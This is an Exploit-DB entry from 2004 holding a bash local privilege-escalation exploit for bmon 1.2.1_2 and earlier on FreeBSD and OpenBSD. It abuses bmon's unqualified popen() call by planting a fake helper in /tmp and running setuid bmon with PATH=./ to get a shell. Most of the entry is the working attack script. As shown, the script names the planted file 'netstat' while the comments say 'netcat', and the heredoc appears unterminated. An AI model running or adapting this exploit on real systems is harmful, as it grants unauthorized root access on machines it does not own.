BSD bmon <= 1.2.1_2 - Local Exploit

Type exploitdb
Reporter Idan Nahoum
Modified 2004-10-16T00:00:00


BSD bmon <= 1.2.1_2 Local Exploit. Local exploit for bsd platform


# Written by Idan Nahoum.
# local exploit for FreeBSD/OpenBSD with bmon &lt; 1.2.1_2 installed.
# when bmon is executed with the -n parameter it popen()s netcat
# but fail to provide an absoluth path.
# some bsds are configured with acls that doesnt allow setuid files to 
# run except those that are explicity allowed, so creating a file called 
# netcat that chmod's +s bash wouldnt work, bash needs to run directly by
# bmon which uses ncurses, so to get a useable shell we need to redirect
# stdout to stderr (stdout is closed), and restore the stty settings.

declare -r SPATH="${PATH}"
declare -r STTY_EXEC=$(which stty)
declare -r STTY_SETTINGS=$(${STTY_EXEC} -g) 
declare -r QSHELL="/usr/local/bin/bash"
declare BMON_EXEC="/usr/local/sbin/bmon"

echo "$0 &lt;path to bmon&gt; [default: ${BMON_EXEC}]"

[ "$#" -gt "0" ] && BMON_EXEC="${1}"

[ -x "${BMON_EXEC}" ] || 
echo "${BMON_EXEC} not found"

cd /tmp

# apparently bmon closes stdout, so we run a shell with stdout redirected 
# to stderr.

cat &gt; ./netstat &lt;&lt;EOF
PATH=${SPATH} /bin/sh 1&gt;&2

/bin/chmod 755 ./netstat
echo "trying to exploit"
PATH=./ "${BMON_EXEC}" -n 

# [2004-10-16]